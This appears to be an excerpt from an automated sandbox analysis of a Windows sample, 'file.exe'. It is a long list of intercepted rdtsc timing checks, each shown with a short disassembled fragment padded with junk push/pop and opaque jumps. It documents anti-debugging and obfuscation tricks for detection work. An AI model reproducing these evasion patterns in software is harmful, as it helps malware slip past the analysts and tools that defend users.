                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1443533 second address: 1443565 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8F347F9F16h 0x00000008 jmp 00007F8F347F9F24h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F8F347F9F24h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 144369F second address: 14436A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14436A3 second address: 14436A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14436A9 second address: 14436C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8F34B47B5Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14436C0 second address: 14436C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14439BF second address: 14439DD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jne 00007F8F34B47B56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007F8F34B47B5Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14439DD second address: 14439E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1448234 second address: 144824C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F34B47B64h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1448515 second address: 1448519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 144867B second address: 1448681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1448AA8 second address: 1448AD9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F8F347F9F29h 0x0000000c pop esi 0x0000000d pop ebx 0x0000000e pushad 0x0000000f jl 00007F8F347F9F22h 0x00000015 jno 00007F8F347F9F16h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 144904C second address: 1449072 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8F34B47B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jne 00007F8F34B47B56h 0x00000011 jnp 00007F8F34B47B56h 0x00000017 jl 00007F8F34B47B56h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jo 00007F8F34B47B56h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1449072 second address: 1449082 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F8F347F9F1Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 144BD11 second address: 144BD49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F8F34B47B56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e jmp 00007F8F34B47B65h 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop esi 0x00000016 jmp 00007F8F34B47B5Fh 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 144EC29 second address: 144EC49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8F347F9F16h 0x0000000a js 00007F8F347F9F16h 0x00000010 jc 00007F8F347F9F16h 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push ecx 0x0000001b pushad 0x0000001c popad 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f pop ecx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 144EC49 second address: 144EC4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 144E419 second address: 144E428 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 144E428 second address: 144E432 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8F34B47B56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 144E432 second address: 144E442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F8F347F9F1Ah 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 144E75B second address: 144E767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 pushad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14527BF second address: 14527C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 145807A second address: 145807E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 145807E second address: 145808E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 jc 00007F8F347F9F1Eh 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 145808E second address: 145809D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F8F34B47B82h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 145809D second address: 14580C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F347F9F24h 0x00000009 jnp 00007F8F347F9F16h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1456A2D second address: 1456A3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F8F34B47B56h 0x0000000a jc 00007F8F34B47B56h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1456E28 second address: 1456E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F347F9F24h 0x00000009 jmp 00007F8F347F9F1Bh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 push esi 0x00000013 pop esi 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a pop eax 0x0000001b jo 00007F8F347F9F16h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1456E5E second address: 1456E64 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1456E64 second address: 1456E6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1456E6A second address: 1456E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1401E71 second address: 1401EED instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8F347F9F1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d sub edx, 5798AD6Ah 0x00000013 mov ebx, dword ptr [ebp+12482F9Ah] 0x00000019 mov cl, 5Ch 0x0000001b add eax, ebx 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007F8F347F9F18h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 0000001Ch 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 mov edx, 61AAB838h 0x0000003c pushad 0x0000003d sbb esi, 1D214F06h 0x00000043 ja 00007F8F347F9F1Bh 0x00000049 mov edx, 0488F3D1h 0x0000004e popad 0x0000004f nop 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F8F347F9F29h 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1401EED second address: 1401F5A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnp 00007F8F34B47B56h 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push ecx 0x00000011 pushad 0x00000012 push edi 0x00000013 pop edi 0x00000014 jmp 00007F8F34B47B5Ah 0x00000019 popad 0x0000001a pop ecx 0x0000001b nop 0x0000001c add dx, 5FD9h 0x00000021 push 00000004h 0x00000023 push 00000000h 0x00000025 push ebx 0x00000026 call 00007F8F34B47B58h 0x0000002b pop ebx 0x0000002c mov dword ptr [esp+04h], ebx 0x00000030 add dword ptr [esp+04h], 0000001Ch 0x00000038 inc ebx 0x00000039 push ebx 0x0000003a ret 0x0000003b pop ebx 0x0000003c ret 0x0000003d nop 0x0000003e jmp 00007F8F34B47B65h 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 jnp 00007F8F34B47B5Ch 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1401F5A second address: 1401F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14573D8 second address: 14573DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1457D1E second address: 1457D3E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F8F347F9F25h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1457D3E second address: 1457D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1457D46 second address: 1457D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1457D4F second address: 1457D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1457D53 second address: 1457D57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1457D57 second address: 1457D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jbe 00007F8F34B47B5Ch 0x00000010 pushad 0x00000011 jl 00007F8F34B47B56h 0x00000017 jmp 00007F8F34B47B60h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1457D86 second address: 1457D8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145B38C second address: 145B3B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F8F34B47B61h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145B3B7 second address: 145B3BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145B887 second address: 145B88B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145B88B second address: 145B89B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8F347F9F16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145B89B second address: 145B8A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145BB27 second address: 145BB39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 push edi 0x0000000a ja 00007F8F347F9F16h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1462B41 second address: 1462B76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B69h 0x00000007 jnp 00007F8F34B47B56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F8F34B47B62h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1462CF6 second address: 1462D02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F8F347F9F16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1462D02 second address: 1462D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1463128 second address: 1463144 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F347F9F23h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146370E second address: 1463718 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8F34B47B56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1464285 second address: 146429F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F347F9F26h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14694FD second address: 1469501 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469501 second address: 1469528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8F347F9F27h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F8F347F9F16h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469528 second address: 1469541 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B65h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469541 second address: 1469575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 pushad 0x00000009 jmp 00007F8F347F9F1Bh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007F8F347F9F25h 0x00000015 popad 0x00000016 je 00007F8F347F9F22h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469575 second address: 146957B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146C6B0 second address: 146C6C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F347F9F1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146C6C3 second address: 146C6FB instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8F34B47B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F8F34B47B5Eh 0x00000010 jmp 00007F8F34B47B66h 0x00000015 popad 0x00000016 jno 00007F8F34B47B8Ch 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146CB12 second address: 146CB16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146CC85 second address: 146CCD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F8F34B47B62h 0x0000000b jnp 00007F8F34B47B56h 0x00000011 jmp 00007F8F34B47B63h 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007F8F34B47B66h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146CDF1 second address: 146CE19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8F347F9F16h 0x0000000a jmp 00007F8F347F9F23h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 js 00007F8F347F9F16h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146CE19 second address: 146CE34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F34B47B67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146CE34 second address: 146CE3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F8F347F9F16h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146CE3E second address: 146CE42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146CE42 second address: 146CE5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8F347F9F20h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 146D153 second address: 146D159 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1474E49 second address: 1474E52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1474E52 second address: 1474E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473186 second address: 14731A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8F347F9F21h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147345D second address: 147347A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007F8F34B47B5Eh 0x0000000b push edx 0x0000000c pop edx 0x0000000d je 00007F8F34B47B56h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473C0A second address: 1473C10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473C10 second address: 1473C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473C14 second address: 1473C2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8F347F9F20h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473C2A second address: 1473C34 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1473C34 second address: 1473C5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F8F347F9F16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jmp 00007F8F347F9F22h 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007F8F347F9F16h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14744CA second address: 14744DC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8F34B47B56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F8F34B47B5Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14744DC second address: 14744E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14744E7 second address: 14744EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14744EB second address: 14744F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1472BF3 second address: 1472BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1472BF9 second address: 1472C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1472C02 second address: 1472C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1472C06 second address: 1472C0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147CDBC second address: 147CDC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147CDC0 second address: 147CDC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147CDC4 second address: 147CDD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147CDD2 second address: 147CDDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F8F347F9F16h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147CEEF second address: 147CF1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8F34B47B69h 0x00000009 pop edx 0x0000000a pushad 0x0000000b js 00007F8F34B47B56h 0x00000011 jnl 00007F8F34B47B56h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147D07E second address: 147D0A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8F347F9F29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
